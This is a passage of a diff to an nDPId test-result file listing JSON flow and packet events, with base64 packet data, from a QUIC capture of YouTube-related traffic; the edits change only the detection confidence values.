02263{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1463060980361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980361,"pkt":"eJKcD6iO8IQvSpdgCABFAAViEvYAADMR8Kas2RAEwKgBaQG7smUFTookAAGQybRh4NjU1uL582WDWYRD2dtjLe0ntuD1Rv2\/b2fKGeJD6xTTVAUMsP2lDwoVXXJwitAjM1Ss3TeNIyNiPaVEHvBHWgnmTCyfAFo80jSe0xJw6Ybz6w3BHKed9Mf4LC34oG\/VIDlHTxzV6KkXcvqfJ+U14RSVhKW3KAUcxQl5Qnl+FE6bIGsShbMSV6P+UWlpqynVxRJTYzRSpGWAchBBRlF7EhFWsrYnblyXrD3VTjEqg879fRXYm2D6G+l3V3l4hCc8odvANTzc501Sej7x6oDCtVRndJ56LpiERNpHUkSjmM00+Wy1dbMT\/Vm99GrTmWmQ58Bhd7+x\/sycdH8p6kPEaBRymR3LuujKz\/Gp3cYG3YCBKEJqKQbhAu5X3FQ9PXBc+M62o93W9PU8b6NIWgn7PPkt\/looi8HdoxE9N0Q1KeX\/DgvtM+nwxVmrskJK6Thzut4c\/pKoeIdgzgc3\/jHyNkNEOaEuYipEhpS0\/Q+tOI16w+YZPxlDlM2uXgEDMcZKpZ3i643hutLioOhndNrgTa+7hlc5d+9fBUPIG4kEo\/3qe\/1sIW96DdumLgeq7hN8q9ipK\/OYJXgatYkOUytQ0BidBbi0s1rXKIV0\/20SDyn2cTxo7WHBdcfDH2uOAi\/TCrRfDAaRNQYOzMWy\/oZuiEP4GWby88PrtsqP7zlBhlOROw4HDIjA48YJ3izoMulzCHWEfBSraR6GRvLlvTobSdvt\/z+UVvoGEaNUxGfD3NV\/ys6k8iURbaIUpy8FqGPXqO5y1+eef+JbMhHxVscn06dBggRMWGOOEqj0iilT1RKBH9sFsvyyAlIRcyu73\/dSHY+X7jFjSREVA2KvZo6yurWHJdfQmRknszSHCEHvhyALYDYo7SRCnZFDn5E9W3gfJx9JMvRGkKHXuxSF3xLvoY5nZEGBaR+XmmVlyrTJABRhDpbAmZ5n4r9hBYxhQHxcHxiGFFAZf8z0g25Mt1TpS14HKgYd19UYag4E9v9SK0NipYTC9fTFM1QGWJgR0BKWBdAxjVtOeAxGYzbRhH6dsuYtciI4zHHsc2k8CUrpT7INwMysA9v0qD2r5uYmQ8cWNQI093fnUkc1ZiLc0jIwKw1r5S6aXpzTXj770vHeucOObKGH\/cu1fclnWip+hpVKiVNyqyTuHufVLPShgYbyGVCuWpZPLDtm2Jgl78SGXcMPJqMT\/eMThOsXIuSLcIkh41PVNQKxF5sBj\/BOj5ESvnmDK6QkupJ4WgD36Qg55pRhbyhTXn3wlt2Wr\/yvzjY+U2Y7nfQG6dNeCf\/ZR4o941mW0nR93XyOa+USW4ElVSAKkaXcwrIvcK8SdED4dYTXRprenIgGMn8eEVkFhh5c+SVUq+XERE8IzY1QaFHpJZP8fwhzTmsejKR4iNGy5hDCfipCmLS34n3Ti+BCtXRamD+5SfxUJJlOaGuDx1ZxsJ+DRIsQP+0kLMojxKXXv8fxv+kjUQYTnOJebQGi1vj1CqRIxf5a70YpuiubpyNGMG3LRDDgT1bz3u8MXCO6UUeWAw7iQ0bpGgmPr47zuIVkRhe2cIWsbNBRCq+DfTxqyI5xdGH+ZdSvdGdcCnw7eeyZKURtoMVPU9ujTUcxOz5LcEN\/TxALvQe7jb0VWnhZrurBM\/tZX7uY\/NVzfAVeTgxdzrV78G5uYYEagOMAWzfqvOVOd0DJVYOhYStQVf878CnlBQP9yq8zVHiaudHd7jYBpAflemve6zr2sCq3IlfpR3vKBjLqbY7vKTWflGz9T6iOy4tB+9SN2sXj4A2cmfb4"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1463060980364,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980364,"pkt":"8IQvSpdgeJKcD6iOCABFAAViJrhAAEARqpjAqAFp2DrJ7tp+AbsFTrs0DdvEpLUMteNnUTAyNQF\/L3UOAoUxuEbp+7YBoAEABENITE8XAAAAUEFEAFcBAABTTkkAYgEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zLnl0aW1nLmNvbbTKJy3aOx+44evN5g4\/bhdbtR7MQzwZCntatSQ+G8ewpnq2IX6bmQGJ6u0gPE\/alKxhVCh5gNqzZa48ANz\/fzn8t\/OZMVjaOBqhnSl8gs5MAKWKvx2rs4aeJgBO0M1ar5HmEtqD1e+f9L6rfh+tUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0S2TVLqHgVarrziXF9vRgZfRbyyeop0hCtvyBkGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjSnz1A5VQjBXngqx54WDpGpAAAAAFg1MDkAABAAHgAAAAEtDDoRyfLDyY7FDWPOtGGCrqeP59Ev12tUbO63fzUkAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrhREBANWx00HuRXMG0vkL7viDDbkIpOBViFNO6g+NNdysNjd851pEDUZpbHOuJYtW0iX4hBg5fY5j3AROZ3LGqn4GtUunxLSKIjTGQCqElPyRHXp8aZanMkwEPAt6EM7grDPd5Xwii1XuJA6M67q0oAq4SWvvMG1sUGL2sjhrCJT2dHXvhq+Y03p2EXtsBsu4SwWblRpFN82TNjK4JK6xcJx5X0VS7I5kAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980364,"flow_last_seen":1463060980364,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980364,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.238","src_port":55934,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1463060980377,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1463060980377,"pkt":"eJKcD6iO8IQvSpdgCABFAABtTPkAADMRu5ms2RADwKgBaQG7ng0AWd\/uADd2O2oBZL+pVdP7tzva+fHvZhkEEtFfk705wPfWHPtzaQLZxSHnInASbTD2097V+S960VCK+SG68+SzP6VbXn8\/e\/F4Y7OlxWw39RE6om32"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1463060980378,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980378,"pkt":"8IQvSpdgeJKcD6iOCABFAAViJXJAAEARouvAqAFp2DrS4dI5AbsFTmmUDQ+yIGZd4AviUTAyNQGAeAVQdnPN3KBdghsAoAEABENITE8XAAAAUEFEAFMBAABTTkkAYAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXl0My5nZ3BodC5jb23Qhl3t4O7jCNI4\/86cd6fedmETl+HX+i21qzSEiNb4OJfB1Z4x91CByMieITzxdi32+v4DBxDEfj4iCcg46VL\/PH8fxOKMEzAFEjMjm3TRFNLXbtT6qGv6iFQOxYDkzP0ABTP7FYiXHH9noNffRk12UTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn02TPR2k9zoZDH1PYmCZf2Zt1J713FQWCpFni4GGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQlEdwQCcHdE7bz3Yek8lX\/AAAAAFg1MDkAABAAHgAAAHebYWUW7CksegbNUHmoS00JCUhXrcp5peVS86L6lokeAQAAAEMyNTVGSVhEYnkO9pznNwziYxqCfXGFX0ALe5CprnnrLQMBAMirDAfWX8CjXhckfelJ8XlBmAh34iT31gIDz8lnlm4Q\/bpdZ31E6\/Xb4Zw1dQ4d56j0Eolero2q9ipFB5AjgjU5le2N8ZGkm7r3g24DXoIf95dR23D5dPhHt4gzaLbSHu3jXT7dZ4nC9v+kOJu9q4K2bd+Xl47r9Vjbe0PzK8JTkSpeZDmRHU3bz95Toi6T6fqfvQJWfNqRdNdObQaDdl8+eoJfAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"quic.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980378,"flow_last_seen":1463060980378,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1463060980378,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.225","src_port":53817,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"yt3.ggpht.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1463060980388,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1463060980388,"pkt":"8IQvSpdgeJKcD6iOCABFAABBHBJAAEARn6vAqAFprNkQBLJlAbsALZ9GDEPl1BjSnP0KAohkBW4mjqf+lWrwMPohYA0CsIfpCV\/yUKbgEg=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1463060980404,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1463060980404,"pkt":"8IQvSpdgeJKcD6iOCABFAABBthxAAEARBaLAqAFprNkQA54NAbsALeHSDKM2rKXAEd7wI3gnMNVg\/Bju+TzyuAKq97AJFlbG89vA9kIRtA=="} 02257{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1463060980407,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980407,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi+XIAADIRHN7YOtLuwKgBaQG7hoYFTgeIDKSWOQdzcSypAcCvMwGYTq6shxzW1ACAAVJFSgAGAAAAU1RLAHIAAABTTk8AqgAAAFBST0bxAAAAU0NGR4QBAABSUkVKiAEAAENSVP9UBQAA1qWbZaKGGMNu4n0IFd5qvoUTzfScMrQM62F5Klyoy\/gr13Knz1tigfd0ZqNrTwQKxsh0E3PeOsScdXLYKjs8qyiEuOy1a7C4zg63fuUtHJYgH7qkJ5NPVCX92UrREjVCY9dWARG+L7cbZT7AgaahFE1+Dc9xqUra0W3ZNGbmcka6SHMYwJHMeW3B7eVH3uELXrdKJ+QLpbj4b09tDQ\/XNJTmasaKcqcHQQkwRQIgPMYj0Pf7PCP2uxgZgQXPwKb2tHTcOJUmmbK8MQNIgfsCIQDeu6cth5DDb1874iP6IpBL709rtt3G3ayeVYw33VYBN1NDRkcHAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAUFVCUz8AAABLRVhTQwAAAE9CSVRLAAAARVhQWVMAAABBRVNHQ0MyMO4xNazIxw51CPh92NozyjFDSElEIAAArqfGpWlX\/ID+ijs5XuaY5l76DioG\/jdi0YAeXXF\/CmtDMjU1eOLS2hoopbZAEzdXAAAAAA0AAAABAwHogWCSkhroAwAAAAN7Junn5Fxx\/wAAAAAA\/wYAAHi7c1AtxPvNxgAsudi+GzSx3oe04Tic2NatWf922kf0hhwVG1mgwsAMmIdMgPkF1p4zMDcyN7AwtgR1otKwWsXBw+UMTDdp+UV5mYmwBMnOw+ubX5pXAkpdYZmp5XB38SC7S9RAGOwuHh4tYJiChMGRGwkUZgf68ZwtsPnBAWYwM7IzOzGwvF91fdMNT2Ud1a7MlSledVlybaZOW\/IT25eYrq8qUp7OLmq33YHB9tcRfpb4rOn2rfYyM5bOl9xpdepuGi\/LiYsHpi9uYuk3aGLpJlSANTGD+wiCLE3MrkCOYxOKA5t4tfQS81KK8jPBDZ4mMSC3oCA1Lz0zLxVZmZCWXnJOfmkKspgYzCDdxLzEnMqSzORisDg3woJEZE5OEx+S1XqZeaj8rAJUfml2Ez+yU\/USi9AFStEEktBVJOejCeRWoAmUoGspy0Nyc0oqEie1GImTVoTEyShF4mSWIHHycpA4BSicElCgQjiJKcAiABJ4cMdARPKaRGACQNncVGCLAqxMECZalpmSmg8WAsVrcQmwYEwGaeNF4gEluYDcshJDJLYRmA00PTe1pAioClk10Chg2yUjE1xANQmAeDloMV+ZX1pSmpSqm5efnJ+fnQlPTFBxNGWpKaWQKhyWQICpJTcdzJGCJ7+czNS8kmJke7iRkyYLSH0TG1Aa2MZpEsGa9LiQkyyWYONC8hYXuGiGmMYBdqdeEjC6kT0ggs35SA0q9gaDDKRiOQZYsGgjFbjy0DKwIDsTyVf67p6O7kbgElUbqQyHKYYGgyGyDlC5jtTI273NV8E2Yd+C1ye2dnFOb2eeVW6ug9bQQS6rsfaMFCEtB2DVhdYd4WBjS2\/kARbTBgaQpo6mgbqB6gLlBYqE\/JODrSszjftYydWvQWHrJl8LaGcoCDtX+zF57w+1k7kVtnVpynvVDocqpnI0GGrun+excBbbk\/WtwdM1pruv4DC9rbrjjuzUh5nbWX\/pvc8t5nyiovfjwmtmI4UJXPKZTu5BF9\/Zcy1\/ucu1+fj1my\/1QiLLjwa6eC40ny7X1+yaMeXv6+AnN8+Hscy0b3aWiM\/4f24pi0LZ9UUc95\/XzHjyptDwc\/Gl7CxFnY+ZRZOXZM9a4Our\/25u"} @@ -46,22 +46,22 @@ 02249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1463060980446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980446,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi7JoAADERM7bYOsnuwKgBaQG72n4FTiSvDNvEpLUMteNnAaUNyY55Ftxcp3QgTgCAAVJFSgAGAAAAU1RLAHAAAABTTk8AqAAAAFBST0bvAAAAU0NGR4IBAABSUkVKhgEAAENSVP9SBQAAJy7nP96y9QV42MKrzfRCPLT87WDRH7Fd5bV2IYJV5uerSuKcuz27mxBT4+gnyC4BMUrik01sKIil0iRgGwZXZriX2eqvjy0wvoZPR2mR64H2U8+GZaQSd+4vVoONHW5kMsgcr5Q\/br7AM9doxRgjn+8O22aMyRRKIbkIgECxfZ+3gPhZwCGzY3E1Vh0YGcUrXggtX0cSYrBSP4FN90wRk2Ud5VnIkrPbMEUCIQD6BAJQX5LoIPZW+skklsA6cQo9kEO8kehkPXFxP3LI1QIgI\/gkfWgDPoL5UerIs+RuGzTUGbty897xHCg0JJUpIv9TQ0ZHBwAAAEFFQUQIAAAAU0NJRBgAAABQRE1EHAAAAFBVQlM\/AAAAS0VYU0MAAABPQklUSwAAAEVYUFlTAAAAQUVTR0NDMjCzHyexPo2T9WCZD4U6m8alQ0hJRCAAAN5dryiyxa3rgUlMMcjfu+Bv+FmXvUMT6V4zrZRMsB8LQzI1NSKpyEIGkw80gGo2VwAAAAANAAAAAQMB6IFgkpIa6AMAAAADeybp5+Rccf8AAAAAAP8GAAB4u3NQLcT7zcYALLnYvhs0sd6HtOE4nNjWrVn\/dtpH9IYcFRtZoMLADJiHTID5BdaeMzA3MjewMLYEdaLSsFrFwcPlDEw3aflFeZmJsATJzsPrm1+aVwJKXWGZqeVwd\/Egu0vUQBjsLh4eLWCYgoTBkRsJFGYH+vGcLbD5wQFmMDOyMzsxsLxfdX3TDU9lHdWuzJUpXnVZcm2mTlvyE9uXmK6vKlKezi5qt92BwfbXEX6W+Kzp9q32MjOWzpfcaXXqbhovy4mLB6YvbmLpN2hi6SZUgDUxg\/sIgixNzK5AjmMTigObeLX0EvNSivIzwQ2eJjEgt6AgNS89My8VWZmQll5yTn5pCrKYGMwg3cS8xJzKkszkYrA4N8KCRGROThMfktV6mXmo\/KwCVH5pdhM\/slP1EovQBUrRBJLQVSTnownkVqAJlKBrKctDcnNKKhIntRiJk1aExMkoReJkliBx8nKQOAUonBJQoEI4iSnAIgASeHDHQETymkRgAkDZ3FRgiwKsTBAmWpaZkpoPFgLFa3EJsGBMBmnjReIBJbmA3LISQyS2EZgNND03taQIqApZNdAoYNslIxNcQDUJgHg5aDFfmV9aUpqUqpuXn5yfn50JT0xQcTRlqSmlkCoclkCAqSU3HcyRgie\/nMzUvJJiZHu4kZMmC0h9ExtQGtjGaRLBmvS4kJMslmDjQvIWF7hohpjGAXanXhIwupE9IILN+UgNKvYGgwykYjkGWLBoIxW48tAysCA7E8lX+u6eju5G4BJVG6kMhymGBoMhsg5QuY7UyNu9zVfBNmHfgtcntnZxTm9nnlVuroPW0EEuq7H2jBQhLQdg1YXWHeFgY0tv5AEW0wYGkKaOpoG6geoC5QWKhPyTg60rM437WMnVr0Fh6yZfC2hnKAg7V\/sxee8PtZO5FbZ1acp71Q6HKqZyNBhq7p\/nsXAW25P1rcHTNaa7r+Awva26447s1IeZ21l\/6b3PLeZ8oqL348JrZiOFCVzymU7uQRff2XMtf7nLtfn49Zsv9UIiy48GunguNJ8u19fsmjHl7+vgJzfPh7HMtG92lojP+H9uKYtC2fVFHPef18x48qbQ8HPxpewsRZ2PmUWTl2TPWuDrq\/9ubtJn"} 02240{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"quic.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1463060980446,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1463060980446,"pkt":"eJKcD6iO8IQvSpdgCABFAAVi7JsAADERM7XYOsnuwKgBaQG72n4FTodMDNvEpLUMteNnAjCUFcdtv6XHZbkQxgCkAS0FXQCLsNsKswVSG3lP+qzvmF246uDhGtUyFwaTzRJRxS8XOFxmLluatV\/uy7O6p0+N2bQ\/+Zrt1fpZeW6648bpNyd9YDE3eJJ8v\/9lvMKhkrynd\/W+TFqduscYADp6WRYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA